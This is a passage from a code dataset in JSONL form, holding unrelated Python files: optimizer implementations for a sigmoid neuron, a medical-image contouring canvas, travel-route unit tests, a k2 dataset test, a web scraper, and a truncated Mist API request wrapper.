\"):\n k, v = map(str.strip, param.split(\":\"))\n info[k] = v\n\nif info:\n print(count + validate(info))\nelse:\n print(count)\n","repo_name":"AD9000/AdventOfCode","sub_path":"python/Day4/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40520770093","text":"import numpy as np\n\nclass SN:\n def __init__(self, w_init, b_init, algo):\n self.w = w_init # Weight\n self.b = b_init # bias \n self.w_h = [] # History of weight\n self.b_h = [] # History of bias\n self.e_h = [] # Loss \n self.algo = algo # Algorithm\n \n def sigmoid(self, x, w=None, b=None):\n if w is None:\n w = self.w\n if b is None:\n b = self.b\n return 1. / (1. 
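# Sanity checks for the checkNum helper above (assumed semantics: a numeric
# string whose value lies within [low, high] inclusive; anything
# non-numeric is rejected):
assert checkNum("1920", 1920, 2002)
assert checkNum("2002", 1920, 2002)
assert not checkNum("2003", 1920, 2002)
assert not checkNum("19a0", 1920, 2002)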
+ np.exp(-(w*x +b)))\n    \n    def error(self, X, Y, w= None, b= None):\n        if w is None:\n            w = self.w\n        if b is None:\n            b = self.b\n        err = 0\n        for x,y in zip(X,Y):\n            err += 0.5 *(self.sigmoid(x,w,b) - y)**2 # SUM OF SQUARED ERRORS\n        return err\n    \n    \n    def grad_w(self,x,y, w=None,b=None):\n        if w is None:\n            w = self.w\n        if b is None:\n            b = self.b\n        y_pred = self.sigmoid(x,w,b)\n        return (y_pred -y) * y_pred * (1 - y_pred) *x\n    \n    def grad_b(self,x,y, w=None, b=None):\n        if w is None:\n            w = self.w\n        if b is None:\n            b = self.b\n        y_pred = self.sigmoid(x,w,b)\n        return (y_pred - y) * y_pred *(1 - y_pred)\n    \n    \n    def fit(self, X, Y,\n            epochs=100, eta=0.01, gamma =0.9,\n            mini_batch_size=100, eps=1e-8,\n            beta =0.9, beta1=0.9, beta2 =0.9):\n        self.w_h = []\n        self.b_h = []\n        self.e_h = []\n        self.X = X\n        self.Y = Y\n        \n        \n        if self.algo == 'GD':\n            for i in range(epochs):\n                dw, db =0, 0\n                for x,y in zip(X,Y):\n                    dw += self.grad_w(x,y)\n                    db += self.grad_b(x,y)\n                self.w -= eta * dw / X.shape[0]\n                self.b -= eta * db / X.shape[0]\n                self.append_log()\n        \n        elif self.algo == 'Momentum':\n            v_w_prev, v_b_prev =0, 0\n            for i in range(epochs):\n                dw, db = 0, 0\n                for x,y in zip(X,Y):\n                    dw += self.grad_w(x,y)\n                    db += self.grad_b(x,y)\n                v_w = gamma * v_w_prev + eta * dw\n                v_b = gamma * v_b_prev + eta *db\n                self.w = self.w - v_w\n                self.b = self.b - v_b\n                v_w_prev = v_w\n                v_b_prev = v_b\n                self.append_log()\n        \n        elif self.algo == 'NAG':\n            v_w_prev, v_b_prev = 0, 0\n            for i in range(epochs):\n                dw, db = 0,0\n                v_w = gamma * v_w_prev\n                v_b = gamma * v_b_prev\n                for x,y in zip(X,Y):\n                    dw += self.grad_w(x, y, self.w - v_w, self.b - v_b)\n                    db += self.grad_b(x, y, self.w - v_w, self.b - v_b)\n                \n                v_w = gamma * v_w_prev + eta * dw\n                v_b = gamma * v_b_prev + eta * db\n                self.w = self.w - v_w\n                self.b = self.b - v_b\n                v_w_prev = v_w\n                v_b_prev = v_b\n                self.append_log()\n        \n        elif self.algo == 'MiniBatch':\n            for i in range(epochs):\n                dw, db = 0, 0\n                points_seen = 0\n                for x,y in zip(X,Y):\n                    dw += self.grad_w(x,y)\n                    db += self.grad_b(x, y)\n                    points_seen += 1\n                    if points_seen % mini_batch_size == 0:\n                        self.w -= eta * dw / mini_batch_size\n                        self.b -= eta * db / mini_batch_size\n                        self.append_log()\n                        dw, db = 0,0\n        \n        elif self.algo == 'AdaGrad':\n            v_w, v_b = 0, 0\n            for i in range(epochs):\n                dw, db = 0, 0\n                for x,y in zip(X,Y):\n                    dw += self.grad_w(x, y)\n                    db += self.grad_b(x, y)\n                v_w += dw**2\n                v_b += db**2\n                self.w -= (eta / (np.sqrt(v_w) + eps)) * dw\n                self.b -= (eta / (np.sqrt(v_b) + eps)) * db\n                self.append_log()\n        \n        elif self.algo == 'RMSProp':\n            v_w, v_b = 0, 0\n            for i in range(epochs):\n                dw, db = 0, 0\n                for x, y in zip(X, Y):\n                    dw += self.grad_w(x,y)\n                    db += self.grad_b(x ,y)\n                v_w = beta * v_w + (1- beta)* dw**2\n                v_b = beta * v_b + (1 - beta) * db**2\n                self.w -= (eta / (np.sqrt(v_w) + eps)) * dw\n                self.b -= (eta / (np.sqrt(v_b) + eps)) * db\n                self.append_log()\n        \n        elif self.algo == 'Adam':\n            \n            v_w, v_b = 0, 0\n            m_w, m_b = 0, 0\n            num_updates = 0\n            for i in range(epochs):\n                dw, db = 0,0\n                for x,y in zip(X,Y):\n\n                    dw = self.grad_w(x,y)\n                    db = self.grad_b(x,y)\n                    num_updates += 1\n                    m_w = beta1 * m_w + (1 - beta1)*dw\n                    m_b = beta1 * m_b + (1- beta1)*db\n                    v_w = beta2 * v_w + (1 -beta2) * dw**2\n                    v_b = beta2 * v_b + (1 - beta2) * db**2\n                    m_w_c = m_w / (1 -np.power(beta1, num_updates))\n                    m_b_c = m_b / (1- np.power(beta1, num_updates))\n                    v_w_c = v_w / (1- np.power(beta2, num_updates))\n                    v_b_c = v_b / (1- np.power(beta2, num_updates))\n                    self.w -= (eta / (np.sqrt(v_w_c) + eps)) * m_w_c\n                    self.b -= (eta / (np.sqrt(v_b_c) + eps)) * m_b_c\n                    self.append_log()\n        \n    def 
append_log(self):\n self.w_h.append(self.w)\n self.b_h.append(self.b)\n self.e_h.append(self.error(self.X, self.Y)) ","repo_name":"prajinkhadka/Optimization_Algorithms_Visualization","sub_path":"SigmoidNeuron.py","file_name":"SigmoidNeuron.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"40735612475","text":"import gen\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\ndef fetchYearTeams(year):\r\n raw = requests.get('https://first.global/'+ str(year) +'-nations/')\r\n soup = BeautifulSoup(raw.content, \"lxml\")\r\n articles = soup.find_all('article')\r\n \r\n baseList = []\r\n finalList = []\r\n for article in articles:\r\n link = article.find('a')\r\n name = link.get('title')\r\n url = link.get('href')\r\n \r\n if name not in baseList:\r\n baseList.append(name)\r\n \r\n cleanedName = name.replace('Team ', '').replace(' '+str(year), '')\r\n finalList.append({'Team': cleanedName, 'Link': url})\r\n\r\n return finalList\r\n\r\nteams2018 = fetchYearTeams(2018)\r\nteams2017 = fetchYearTeams(2017)\r\n\r\nnames2017 = [team['Team'] for team in teams2017]\r\nfor team in teams2018:\r\n in2017 = team['Team'] in names2017\r\n \r\n team['In 2017'] = ''\r\n if in2017:\r\n team['In 2017'] = 'Yes'\r\n\r\n\r\nteams2018 = sorted(teams2018, key = lambda k: k['Team'])\r\ngen.listOfDictToCSV('FGC 2018 Teams', teams2018, ['Team', 'Link', 'In 2017'])","repo_name":"PChild/frc-data-scripts","sub_path":"fgcData.py","file_name":"fgcData.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35719728097","text":"test = \"2\"\r\nprint(test)\r\n\r\na = int(\"15\")\r\nb = int(\"12\")\r\nc = a+b\r\nprint(c)\r\n\r\nx = float(\"56.15\")\r\ny = int(\"12\")\r\nc = x+y\r\nprint(c)\r\n\r\ntest = str(input(\"Firstname\"))\r\ntest2 = str(input(\"Lastname\"))\r\nres = test + \" \" + test2\r\nprint(res)\r\n\r\n","repo_name":"Nairi-IT/NI","sub_path":"Lesson_N1.py","file_name":"Lesson_N1.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40461522994","text":"import hashlib\nimport logging\nimport os\nimport threading\nimport time\nfrom tkinter import *\n\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageTk\n\nfrom src.ImageProcessing.contouring import cnt_from_img, save_contour, save_image\n\n\nclass ResizingImageCanvas(Canvas):\n \"\"\"\n Customized Canvas that can handle dynamic image resizing and displays for slice contours.\n \"\"\"\n\n def __init__(self, parent=None, image=None, dicom_manager=None, **kwargs):\n \"\"\"\n Initializer\n :param parent: The parent to this tk Element\n :param image: The image to load\n :param dicom_manager: The DicomManager instance to assign to this class\n :param kwargs: Keyword arguments to pass to parent\n \"\"\"\n Canvas.__init__(self, **kwargs)\n self.parent = parent\n self.dm = dicom_manager\n self.logger = logging.getLogger(__name__)\n\n # Configure key and mouse bindings\n self.bind(\"\", self.keydispatch)\n self.bind(\"\", self.on_resize)\n self.bind(\"\", self.create_point)\n self.bind(\"\", self.plot_points)\n self.bind(\"\", self.toggle_smoothing)\n self.configure(cursor=\"crosshair red\")\n self.configure()\n\n # Configure window size\n self.height = self.winfo_reqheight()\n self.width = self.winfo_reqwidth()\n\n # Configure contour parameters\n 
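# Hypothetical driver for the SN class above: fit the same two-point toy
# dataset with two update rules and compare the final losses (all data
# values here are made up for illustration):
import numpy as np

X = np.asarray([0.5, 2.5])
Y = np.asarray([0.2, 0.9])

for algo in ('GD', 'Adam'):
    sn = SN(w_init=-2.0, b_init=-2.0, algo=algo)
    sn.fit(X, Y, epochs=1000, eta=0.25)
    print(algo, 'final loss:', sn.e_h[-1])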
self.user_points = []\n        self.spline = 0\n        self.new_point = False\n        self.user_line_tag = \"usr_line\"\n        self.user_point_tag = \"usr_point\"\n        self.contour_line_tag = \"cnt_line\"\n        self.contour_point_tag = \"cnt_point\"\n        self.contours = None\n        self.curr_contour = 0\n        self.cnt_points = []\n        self.contour_image = None\n        self.contour_photo = None\n\n        # Configure image parameters\n        self.image_path = \"\"\n        self.image_folder = \"\"\n        self.image_names = []\n        self.image_idx = 0\n        self.image = None\n        self.photo = None\n\n        # Configure ROI parameters\n        self.roi = None\n        self.roi_set = False\n\n        self.cnt_img = None\n\n        self.thresh_val = 70\n\n        self.ready = False\n\n        self.set_image(image)\n\n    def set_dm(self, dm):\n        if dm is not None:\n            self.logger.info(\"Got new DICOMManager\")\n            self.dm = dm\n\n    def keydispatch(self, event):\n        \"\"\"\n        Receives key events and chooses the appropriate action.\n        :param event: The key event to process\n        \"\"\"\n        self.logger.debug(\"User pressed: '{}'\".format(event.keysym))\n        if event.keysym == \"Right\":\n            self.update_contour_idx(1)\n        if event.keysym == \"Left\":\n            self.update_contour_idx(-1)\n        if event.keysym == \"Down\":\n            self.export_contour(self.curr_contour)\n        if event.keysym == \"a\":\n            self.logger.info(\"Current image: {}\".format(self.image_idx))\n            self.update_image_idx(-1)\n        if event.keysym == \"d\":\n            self.logger.info(\"Current image: {}\".format(self.image_idx))\n            self.update_image_idx(1)\n        if event.keysym == \"x\":\n            self.clear_points()\n        if event.keysym == \"c\":\n            self.apply_corrections()\n        if event.keysym == \"equal\" or event.keysym == \"plus\":\n            self.update_thresh(1)\n        if event.keysym == \"minus\":\n            self.update_thresh(-1)\n        if event.keysym == \"r\":\n            self.activate_roi()\n\n    def activate_roi(self):\n        \"\"\"\n        Activates the region of interest that the user selected.\n        \"\"\"\n        img_arr = self.dm.get_image_array(self.image_idx)\n        self.roi = cv2.selectROI(\n            cv2.cvtColor(np.asarray(img_arr, np.uint8), cv2.COLOR_GRAY2BGR), False\n        )\n        self.extract_roi(img_arr)\n\n    def extract_roi(self, img_arr):\n        \"\"\"\n        Extracts the ROI from the provided image array and sets it as this canvas's image.\n        :param img_arr: An OpenCV image array\n        \"\"\"\n        r = self.roi\n        (x, y, w, h) = r\n        if not x == y == w == h == 0:\n            self.roi_set = True\n            im_crop = img_arr[\n                int(r[1]) : int(r[1] + r[3]), int(r[0]) : int(r[0] + r[2])\n            ]\n            img = Image.fromarray(im_crop)\n            self.image_idx %= self.dm.get_num_images()\n            self.set_image(img)\n\n    def update_image_idx(self, direction):\n        \"\"\"\n        Updates the image index when a user switches image.\n        :param direction: An integer representing whether or not we're moving forward or backward\n        \"\"\"\n        self.clear_points()\n        self.curr_contour = -1\n        self.image_idx += direction\n        # Use images if we don't have DicomManager\n        if self.dm is None:\n            # Wrap the index before using it, so stepping past the last image\n            # cycles back to the start instead of raising an IndexError\n            self.image_idx %= len(self.image_names)\n            path = os.path.join(self.image_folder, self.image_names[self.image_idx])\n            self.open_image(path)\n        else:\n            self.image_idx %= self.dm.get_num_images()\n            img_arr = self.dm.get_image_array(self.image_idx)\n            if self.roi_set:\n                self.extract_roi(img_arr)\n            else:\n                img = Image.fromarray(img_arr)\n                self.set_image(img)\n\n        self.parent.update_slice_label(self.image_idx)\n\n    def update_contour_idx(self, direction):\n        \"\"\"\n        Updates the visible contour on user input.\n        :param direction: An integer representing whether or not we're incrementing or decrementing\n        \"\"\"\n        self.logger.debug(\"Current contour: {}\".format(self.curr_contour))\n        valid_contour = 0 <= self.curr_contour 
+ direction < len(self.contours) - 1\n if valid_contour:\n self.curr_contour += direction\n self.draw_contour(self.curr_contour)\n\n def open_image(self, path):\n \"\"\"\n Opens the image at the provided path for display.\n :param path: The path to the image.\n \"\"\"\n self.focus()\n self.image_path = path\n new_image = Image.open(self.image_path)\n self.set_image(new_image)\n\n def set_image(self, image):\n \"\"\"\n Sets up a PhotoImage from the provided PIL image so the Canvas can display.\n :param image: An Image\n \"\"\"\n if image is not None:\n self.image = image\n self.photo = ImageTk.PhotoImage(self.image)\n self.width = self.photo.width()\n self.height = self.photo.height()\n thread = threading.Thread(target=self.update_contours, args=())\n thread.start()\n self.create_image(0, 0, anchor=NW, image=self.photo)\n else:\n self.create_image(0, 0, anchor=NW)\n self.config(width=self.width, height=self.height)\n self.parent.config(width=self.width, height=self.height)\n\n def update_thresh(self, delta_thresh):\n \"\"\"\n Update the current contouring threshold.\n :param delta_thresh: Amount and direction to change the contour by.\n \"\"\"\n self.thresh_val += delta_thresh\n self.parent.update_thresh_label(self.thresh_val)\n self.update_contours()\n\n def set_folder(self, folder):\n \"\"\"\n Updates the folder the the Canvas reads Images from.\n :param folder: A path to the folder\n \"\"\"\n self.image_folder = folder\n self.image_names = os.listdir(folder)\n for name in self.image_names:\n if os.path.isdir(os.path.join(folder, name)):\n self.image_names.remove(name)\n\n self.image_names.sort()\n self.open_image(\n os.path.join(self.image_folder, self.image_names[self.image_idx])\n )\n\n def update_contours(self):\n \"\"\"\n Updates the computed contours for the current Image.\n \"\"\"\n self.ready = False\n self.configure(cursor=\"clock\")\n\n self.contours = []\n self.curr_contour = 0\n self.contours = cnt_from_img(self.image, self.thresh_val)\n self.logger.debug(\"Got {} contours\".format(len(self.contours)))\n\n self.ready = True\n self.configure(cursor=\"crosshair red\")\n\n def apply_corrections(self):\n \"\"\"\n Updates the image given the user's inputted corrections and updates the contours.\n \"\"\"\n point_list = self.get_point_list(self.user_points)\n point_list_len = len(point_list)\n im = None\n for i in range(point_list_len):\n j = i + 1\n self.logger.debug(\n \"i: {}, j: {}, point_list_len: {}\".format(i, j, point_list_len)\n )\n if j <= point_list_len - 1:\n self.logger.debug(\n \"Drawing points {} and {}\".format(point_list[i], point_list[j])\n )\n im = np.array(self.image.convert(\"RGB\"))\n\n im = cv2.line(\n im,\n point_list[i],\n point_list[j],\n thickness=2,\n color=(255, 255, 255),\n lineType=cv2.LINE_AA,\n )\n self.image = Image.fromarray(im)\n self.update_contours()\n\n def draw_contour(self, cnt_idx):\n \"\"\"\n Overlays the contour at cnt_idx over the currently displayed Image.\n :param cnt_idx: The contour to draw\n \"\"\"\n if self.ready:\n self.delete(self.contour_point_tag)\n self.delete(self.contour_line_tag)\n self.cnt_points.clear()\n\n for point in self.contours[cnt_idx]:\n point_x = point[0][0]\n point_y = point[0][1]\n self.cnt_points.append(point_x)\n self.cnt_points.append(point_y)\n kwargs = {\n \"tags\": self.contour_line_tag,\n \"width\": 2,\n \"fill\": \"red\",\n \"joinstyle\": \"round\",\n \"capstyle\": \"round\",\n }\n self.itemconfigure(self.contour_line_tag, smooth=1)\n self.create_line(self.cnt_points, kwargs)\n else:\n 
self.contours_not_ready()\n\n def export_contour(self, cnt_idx):\n \"\"\"\n Exports the current contour profile to file.\n :param cnt_idx: The contour to write\n \"\"\"\n if self.dm:\n new_path = self.dm.get_output_path()\n else:\n # Save the contour to an image by itself\n path_segs = self.image_path.split(\"/\")\n new_path = \"/\".join(path_segs[:-1])\n new_path += \"/saved_contours/\"\n\n time_hash = hashlib.sha1()\n time_hash.update(str(time.time()).encode(\"utf-8\"))\n file_name_hash = \"{}\".format(time_hash.hexdigest()[:10])\n\n scaling_factor = self.dm.get_scaling_factor()\n\n contour_img_path = os.path.join(\n new_path,\n \"{}-{}-{}-{}-{}\".format(\n file_name_hash,\n scaling_factor,\n self.image_idx,\n self.curr_contour,\n self.thresh_val,\n ),\n )\n\n contour_string_path = os.path.join(\n new_path,\n \"{}-{}-{}-{}-{}.txt\".format(\n file_name_hash,\n scaling_factor,\n self.image_idx,\n self.curr_contour,\n self.thresh_val,\n ),\n )\n\n try:\n os.mkdir(new_path)\n except OSError:\n # directory already exists\n pass\n\n thread = threading.Thread(\n target=save_contour,\n args=(self.contours[cnt_idx], self.width, self.height, contour_img_path),\n )\n thread.start()\n\n # Save a background image for more processing\n bkg_save_path = contour_img_path + \"-bkg\"\n thread = threading.Thread(target=save_image, args=(self.image, bkg_save_path))\n thread.start()\n\n file = open(contour_string_path, \"w\")\n np.set_printoptions(threshold=np.nan)\n file.write(np.array2string(self.contours[cnt_idx], separator=\",\"))\n file.close()\n\n @staticmethod\n def contours_not_ready():\n \"\"\"\n Indicator to show the user that the contours aren't computed yet.\n \"\"\"\n filewin = Toplevel()\n label = Label(filewin, text=\"Contours not ready\")\n label.pack()\n\n def create_point(self, event):\n \"\"\"\n Displays and stores the point from the user's mouse click event.\n :param event: The click event for the user's action\n \"\"\"\n self.focus_set()\n self.new_point = True\n self.create_oval(\n event.x,\n event.y,\n event.x + 1,\n event.y + 1,\n outline=\"red\",\n fill=\"red\",\n tag=self.user_point_tag,\n )\n self.user_points.append(event.x)\n self.user_points.append(event.y)\n\n def plot_points(self):\n \"\"\"\n Plots the connections between the points that the user selected.\n \"\"\"\n if self.new_point and len(self.user_points) > 2:\n self.delete(self.user_line_tag)\n self.spline = 0\n self.create_line(\n self.user_points,\n tags=self.user_line_tag,\n width=2,\n fill=\"red\",\n joinstyle=\"round\",\n capstyle=\"round\",\n )\n\n self.new_point = False\n\n def toggle_smoothing(self):\n \"\"\"\n Toggles between smooth and connect the dot plots for the connections between points.\n :return:\n \"\"\"\n if self.spline == 0:\n self.itemconfigure(self.user_line_tag, smooth=1)\n self.spline = 1\n elif self.spline == 1:\n self.itemconfigure(self.user_line_tag, smooth=0)\n self.spline = 0\n\n def clear_points(self):\n \"\"\"\n Clears the points that the user selected.\n \"\"\"\n self.user_points.clear()\n self.delete(self.user_point_tag)\n self.delete(self.user_line_tag)\n\n @staticmethod\n def get_point_list(point_list):\n \"\"\"\n Zips the lists of x and y coordinates.\n :param point_list: The list of points that the user input\n :return: A list of tuples representing x/y pairs\n \"\"\"\n x_list = point_list[0::2]\n y_list = point_list[1::2]\n point_list = list(zip(x_list, y_list))\n return 
point_list\n","repo_name":"wklock/CAIS","sub_path":"src/View/ResizingImageCanvas.py","file_name":"ResizingImageCanvas.py","file_ext":"py","file_size_in_byte":14436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74261303466","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 29 08:24:44 2018\n\n@author: lucas\n\"\"\"\n\nimport unittest\n\nfrom find_combinations import *\n\nclass TestFindCombinations(unittest.TestCase):\n\n def test_empty_destinations(self):\n origen = \"madrid\"\n destinos_posibles = []\n fecha = \"11/08/2018\"\n dias_por_ciudad = 2\n numero_ciudades = 3\n pasajeros = 2\n combinaciones = 5\n combinations_df = getMatrixAndCombinations (origen, destinos_posibles, fecha, dias_por_ciudad, numero_ciudades, pasajeros, combinaciones)\n print(combinations_df)\n self.assertTrue(True, \"No errors returned\")\n\n def test_4destinations_3cities_2days(self):\n origen = \"madrid\"\n destinos_posibles = ['BCN', 'PAR', 'LON', 'BER']\n fecha = \"11/08/2018\"\n dias_por_ciudad = 2\n numero_ciudades = 3\n pasajeros = 2\n combinaciones = 5\n combinations_df = getMatrixAndCombinations (origen, destinos_posibles, fecha, dias_por_ciudad, numero_ciudades, pasajeros, combinaciones)\n print(combinations_df)\n self.assertTrue(True, \"No errors returned\")\n\n def test_fullMatrixNoDestinos_normScoreInput(self):\n #test_full_matrix = fullMatrixNoDestinos(\"madrid\", df_normalized_city_score, \"11/08/2018\", 2, 3, 2)\n #print(test_full_matrix)\n self.assertTrue(True, \"No errors returned\")\n\n def test_get_combinations_4dest_3cities_2days(self):\n origen = \"BCN\"\n destinos_posibles = [\"DUB\", \"VIE\", \"ATH\",\"TLS\"]\n fecha = \"15/07/2018\"\n dias_por_ciudad = 2\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 10\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n print(full_matrix)\n solucion=\"\"\"\n 2 Barcelona [Atenas, Toulouse, Dublín, Barcelona] \n 0 Barcelona [Toulouse, Atenas, Viena, Barcelona] \n 3 Barcelona [Dublín, Viena, Atenas, Barcelona] \n 1 Barcelona [Toulouse, Atenas, Dublín, Barcelona] \n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\n def test_get_combinations_6dest_3cities_2days(self):\n origen = \"BCN\"\n destinos_posibles = [\"LPL\",\"DUB\", \"VIE\", \"ATH\",\"TLS\", \"MPL\"]\n fecha = \"15/08/2018\"\n dias_por_ciudad = 2\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 10\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n full_matrix\n solucion=\"\"\"\n 1 Barcelona [Liverpool, Dublín, Toulouse, Barcelona] \n 4 Barcelona [Viena, Dublín, Liverpool, Barcelona] \n 0 Barcelona [Liverpool, Dublín, Atenas, Barcelona] \n 3 Barcelona [Liverpool, Dublín, Viena, Barcelona] \n 2 Barcelona [Atenas, Viena, Dublín, Barcelona] \n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\n def test_get_combinations_9dest_3cities_2days(self):\n origen = \"BCN\"\n destinos_posibles = [\"BUD\",\"OTP\", \"SOF\", \"PRG\", \"ATH\", \"KRK\", \"WAW\", \"DBK\", \"BTS\"]\n fecha = \"15/08/2018\"\n dias_por_ciudad = 3\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 4\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n full_matrix\n solucion= \"\"\"\n 1 Barcelona [Praga, Varsovia, 
Bratislava, Gerona] \n 2 Barcelona [Sofía, Budapest, Praga, Barcelona] \n 0 Barcelona [Sofía, Atenas, Bucarest, Barcelona] \n 3 Barcelona [Sofía, Atenas, Budapest, Barcelona]\n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\n def test_get_combinations_8dest_3cities_3days(self):\n origen = \"BCN\"\n destinos_posibles = [\"BUD\",\"OTP\", \"SOF\", \"ATH\", \"KRK\", \"WAW\", \"DBK\", \"BTS\"]\n fecha = \"15/08/2018\"\n dias_por_ciudad = 3\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 10\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n full_matrix\n solucion=\"\"\"\n 2 Barcelona [Sofía, Budapest, Varsovia, Barcelona] \n 0 Barcelona [Sofía, Atenas, Bucarest, Barcelona] \n 3 Barcelona [Sofía, Atenas, Budapest, Barcelona] \n 6 Barcelona [Sofía, Atenas, Bratislava, Gerona] \n 8 Barcelona [Sofía, Atenas, Varsovia, Barcelona] \n 4 Barcelona [Budapest, Sofía, Atenas, Barcelona] \n 1 Barcelona [Varsovia, Bratislava, Atenas, Barcelona] \n 7 Barcelona [Atenas, Sofía, Budapest, Barcelona] \n 9 Barcelona [Bucarest, Atenas, Sofía, Barcelona] \n 5 Barcelona [Sofía, Varsovia, Bratislava, Gerona] \n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"lucaspastorduran/voltioo","sub_path":"tests/test_find_combinatios.py","file_name":"test_find_combinatios.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951800106","text":"import k2\nimport torch\nfrom rnn_lm.dataset import LmDataset, LmDatasetCollate\n\n\ndef main():\n sentences = k2.RaggedTensor(\n [[0, 1, 2], [1, 0, 1], [0, 1], [1, 3, 0, 2, 0], [3], [0, 2, 1]]\n )\n words = k2.RaggedTensor([[3, 6], [2, 8, 9, 3], [5], [5, 6, 7, 8, 9]])\n\n num_sentences = sentences.dim0\n\n sentence_lengths = [0] * num_sentences\n for i in range(num_sentences):\n word_ids = sentences[i]\n\n # NOTE: If word_ids is a tensor with only 1 entry,\n # token_ids is a torch.Tensor\n token_ids = words[word_ids]\n if isinstance(token_ids, k2.RaggedTensor):\n token_ids = token_ids.values\n\n # token_ids is a 1-D tensor containing the BPE tokens\n # of the current sentence\n\n sentence_lengths[i] = token_ids.numel()\n\n sentence_lengths = torch.tensor(sentence_lengths, dtype=torch.int32)\n\n indices = torch.argsort(sentence_lengths, descending=True)\n sentences = sentences[indices.to(torch.int32)]\n sentence_lengths = sentence_lengths[indices]\n\n dataset = LmDataset(\n sentences=sentences,\n words=words,\n sentence_lengths=sentence_lengths,\n max_sent_len=3,\n batch_size=4,\n )\n\n collate_fn = LmDatasetCollate(sos_id=1, eos_id=-1, blank_id=0)\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=1, collate_fn=collate_fn\n )\n\n for i in dataloader:\n print(i)\n # I've checked the output manually; the output is as expected.\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k2-fsa/icefall","sub_path":"icefall/rnn_lm/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"42428128108","text":"import requests\nfrom requests.exceptions import HTTPError\n\nimport json\n\ntry:\n from config import log_level\nexcept:\n log_level = 6\nfinally:\n from .__debug import Console\n console = Console(log_level)\n\n\nclass Req:\n\n def __init__(self):\n 
self.host = \"\"\n self.session = requests.session()\n self.privileges = \"\"\n \n\n def _url(self, uri):\n \"\"\"Generate the url with the host (in the object) and the uri\n Params: uri\n Return: url\"\"\"\n return \"https://\" + self.host + uri\n\n def _check_authorization(self, method, org_id=\"\", site_id=\"\"):\n return True\n # TODO: current validation may not working in some conditions... Bypassing it\n if method in [\"POST\", \"PUT\", \"DELETE\"]:\n if org_id != \"\":\n for privilige in self.privileges:\n if \"org_id\" in privilige and privilige['org_id'] == org_id:\n if privilige[\"role\"] in [\"write\", \"admin\"]:\n return True\n console.error(\"authorization error\")\n return False\n elif site_id != \"\":\n for privilige in self.privileges:\n if \"site_id\" in privilige and privilige['site_id'] == site_id:\n if privilige[\"role\"] in [\"write\", \"admin\"]:\n return True\n console.error(\"authorization error\")\n return False\n else:\n return True\n\n def _response(self, resp, uri=\"\", multi_pages_result=None):\n if resp.status_code == 200:\n if multi_pages_result == None:\n result = resp.json()\n else: \n result = multi_pages_result\n error = \"\"\n console.debug(\"Response Status Code: %s\" % resp.status_code)\n else:\n result = \"\"\n error = resp.json()\n console.debug(\"Response Status Code: %s\" % resp.status_code)\n console.debug(\"Response: %s\" % error)\n return {\"result\": result, \"status_code\": resp.status_code, \"error\": error, \"uri\":uri}\n\n def mist_get(self, uri, org_id=\"\", site_id=\"\", query={}, page=1, limit=100):\n \"\"\"GET HTTP Request\n Params: uri, HTTP query\n Return: HTTP response\"\"\"\n if self._check_authorization(\"GET\", org_id=org_id, site_id=site_id):\n try:\n url = self._url(uri)\n html_query = \"?\"\n if not query == {}:\n for query_param in query:\n html_query += \"%s=%s&\" %(query_param, query[query_param])\n html_query += \"limit=%s&\" %limit\n html_query += \"page=%s\" %page\n url += html_query\n console.debug(\"Request > GET %s\" % url)\n resp = self.session.get(url)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n if \"X-Page-Limit\" in resp.headers:\n content = resp.json()\n x_page_limit = int(resp.headers[\"X-Page-Limit\"])\n x_page_page = int(resp.headers[\"X-Page-Page\"])\n x_page_total = int(resp.headers[\"X-Page-Total\"])\n if x_page_limit * x_page_page < x_page_total:\n content+=self.mist_get(uri, org_id, site_id, query, page + 1, limit)[\"result\"]\n return self._response(resp, uri, content)\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n\n def mist_post(self, uri, org_id=\"\", site_id=\"\", body={}):\n \"\"\"POST HTTP Request\n Params: uri, HTTP body\n Return: HTTP response\"\"\"\n if self._check_authorization(\"POST\", org_id=org_id, site_id=site_id):\n try: \n url = self._url(uri)\n headers = {'Content-Type': \"application/json\"}\n console.debug(\"Request > POST %s\" % url)\n 